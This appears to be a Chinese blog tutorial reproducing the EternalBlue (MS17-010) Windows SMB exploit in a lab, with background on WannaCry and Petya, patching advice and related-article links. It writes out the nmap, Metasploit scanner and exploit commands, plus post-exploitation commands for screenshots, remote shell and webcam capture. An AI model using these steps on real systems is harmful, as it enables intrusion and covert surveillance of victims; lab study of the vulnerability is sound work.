永恒之蓝 利用(复现)
我们先介绍一下永恒之蓝:永恒之蓝早在2017年4月15日黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”是利用Windows系统的SMB(445)漏洞可以跳过密码直接获取系统最高权限。或许是因为刚刚兴起的缘故我们对他并没有重视, 但随之发生的一件事让它就此名声大噪或者说是臭名昭著,那就是利用它加以改造的wannacry 勒索病毒。 它刚一出现就引起波然大动,全球各国都有地方受到攻击。被袭击的设备被锁定,并索要300美元比特币赎金。要求尽快支付勒索赎金,否则将删除文件,甚至提出半年后如果还没支付的穷人可以参加免费解锁的活动。原来以为这只是个小范围的恶作剧式的勒索软件,没想到该勒索软件大面积爆发,许多高校学生中招,愈演愈烈。
它的攻击方式是:恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、 等恶意程序。本次黑客使用的是Petya勒索病毒的变种Petwarp,攻击时仍然使用了永恒之蓝勒索漏洞,并会获取系统用户名与密码进行内网传播。本次爆发使用了已知OFFICE漏洞、永恒之蓝SMB漏洞、局域网感染等网络自我复制技术,使得病毒可以在短时间内呈爆发态势。同时,该病毒与普通勒索病毒不同,其不会对电脑中的每个文件都进行加密,而是通过加密硬盘驱动器主文件表(MFT),使主引导记录(MBR)不可操作,通过占用物理磁盘上的文件名,大小和位置的信息来限制对完整系统的访问,从而让电脑无法启动,相较普通勒索病毒对系统更具破坏性。预防措施:及时下载补丁,修复‘永恒之蓝’漏洞。不要轻易下载不明来路的文件。内网中不要存在使用相同账号和密码的主机。
下面开始对ms17-010(smb445)永恒之蓝漏洞复现
- 搭建测试环境
两台虚拟机 :
一 kali linux (攻击机) IP:192.168.220.134
二 Windows 7 专业版(被攻击机)IP:192.168.220.138
注释:被攻击机防火墙需要关闭否则会对实验造成影响。
二.开始复现
1使用nmap扫描器扫描被攻击机是否开启445端口,使用扫描命令nmap -sV 192.168.220.138
如图:
从扫描结果来看被攻击机445端口是开放的,这就表示可以使用永恒之蓝漏洞
2 使用msf(Metasploit)工具,(msf是一个开源的工具,它常常应用于渗透测试方面,它里面六个模块分别为辅助模块(auxiliary)、渗透攻击模块(exploits)、后渗透攻击模块(post)、攻击载荷模(payloads)、空指令模块(nops)、编码器模块(encoders)。它里面含有2000多种漏洞库存,用于测试。广受网络安全方面人士的欢迎。)
先用auxiliary模块对漏洞进行验证如图1 命令:search ms17-010 再用auxiliary/scanner/smb/smb_ms17_010 进行验证是否存在永恒之蓝漏洞,然后查看具体需要配置的东西 show options 如图2,最后开始配置 set rhosts 192.168.220.138 set rport 445配置完输入run开始测试发现漏洞 如图:
图1
图2
图3
再使用msf下的exploit模块进行攻击 命令如下:exploit/windows/smb/ms17_010_eternalblue 如图1,开始设置被攻击机的IP set rhosts 192.168.220.138 端口 set rport 445接着输入run攻击如图2,然后结果我得到权限如图3 。我拿到权限之后可以使用命令screenshot 截图,输入shell可切换被攻击机的Windows shell想要退出来输入exit,webcam_snap//使用摄像头拍照,webcam_stream//在网页开启摄像头。
如图:
图1
图2
如图3
如图4
修补方案 :
1关闭445端口 ,不要打开不必要的的端口
2打开防火墙,安装安全软件
3及时更新系统,安装对应补丁。
提示:本文只做实验教程勿做他用
永恒之蓝 利用(复现)相关推荐
- linux 会不会受到永恒之蓝漏洞,永恒之蓝漏洞复现(ms17-010)
永恒之蓝漏洞复现(ms17-010) 漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机 ...
- MS17-010(永恒之蓝)漏洞复现和分析
MS17-010(永恒之蓝)漏洞复现和分析 一.漏洞简介 1.永恒之蓝介绍: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含&q ...
- 永恒之蓝漏洞复现(ms17-010)
文章目录 一.永恒之蓝(Eternal Blue) 二.复现环境 三.复现过程 1.主机发现 2.进入MSF框架 3.使用ms17-010扫描模块,对靶机进行扫描 3.1使用模块 3.2查看模块需要配 ...
- 永恒之蓝漏洞复现MS17-010
一.简介 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含"永恒之蓝"工具,"永恒之蓝"利 ...
- 043 扫描技术,OpenVAS,AWVS,永恒之蓝漏洞复现
文章目录 扫描技术 扫描神器 资产发现 主机发现: 端口扫描: 网络漏洞扫描 OpenVAS的使用 AWVS的安装与使用 永恒之蓝漏洞复现 扫描技术 扫描 自动化提高效率 扫描神器 nmap,跨平台使 ...
- MS17_010永恒之蓝漏洞复现
MS17_010永恒之蓝漏洞复现 文章目录 漏洞原理 实验环境 信息收集 文章目录 漏洞原理 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可 ...
- metasploit中msfconsole使用教程,永恒之蓝漏洞复现
文章目录 前言 msfconsole常用参数 打开和关闭 search 查找模块 use 使用指定模块 info 查看模块的详细信息 show 查看,set设置 run 和 exploit mf17- ...
- Windows 7 ms17-010永恒之蓝漏洞复现
Windows 7 ms17-010永恒之蓝漏洞复现 复现ms17-010漏洞环境: VMware Workstation : 攻击机:Kali-Linux : 靶机:Windows 7 : 使用步骤 ...
- 【MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6】
MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-0144/5/6 文章目录 MS17-010 Eternalblue | 永恒之蓝漏洞复现 |CVE-2017-01 ...
- 【漏洞复现】MS17-010漏洞(永恒之蓝)复现
永恒之蓝漏洞复现 漏洞复现 对目标靶机建立用户,并且开启靶机的远程桌面,使用该用户进行连接 实验准备:win7 (192.168.217.153).win10.kali.Xshell 实验步骤: 漏洞 ...
最新文章
- Azure 中国四年扩容 12 倍还不够,微软放话:全球每年新建 50-100 数据中心!
- JavaMoney规范(JSR 354)与对应实现解读
- 【Flutter】Flutter 混合开发 ( 关联 Android 工程与 Flutter 工程 | 安卓页面中嵌入 Flutter 页面 | 安卓中启动 Flutter 页面 )
- oracle磁盘使用率很高,oracle安装磁盘使用率100%导致数据插入等操作报错
- 在vs2010中使用nuget安装EF5报错解决方案
- mysql设置check
- 蓝桥杯校内模拟值序列
- java 邮件跟踪_如何跟踪邮件已读状态(Java)
- Ubuntu安装MyEclise16 过程差不多
- 【后缀数组】洛谷P3809模板题
- android同步服务器时间同步,Android时间与服务器同步方案
- 使用IBM ServerGuide安装操作系统
- ImportError: Couldn‘t import Django. Are you sure it‘s installed and available on your PYTHONPATH en
- 目标追踪(二) 滤波初识
- 王垠 java_解读王垠博客“一道 Java 面试题”
- 大学python挂科补考_大学挂科后补考不过怎么样一种体验?
- 移卡参投的乐享互动首日破发:旗下乐刷罚单不断,逾期率高居不下
- SAP中采购订单修改触发重新审批的相关控制逻辑及测试
- 【项目1】家庭记账软件
- 2011年3月全国计算机等级考试四级网络工程师笔试真 233,2011年3月计算机四级网络工程师考试真题及答案解析...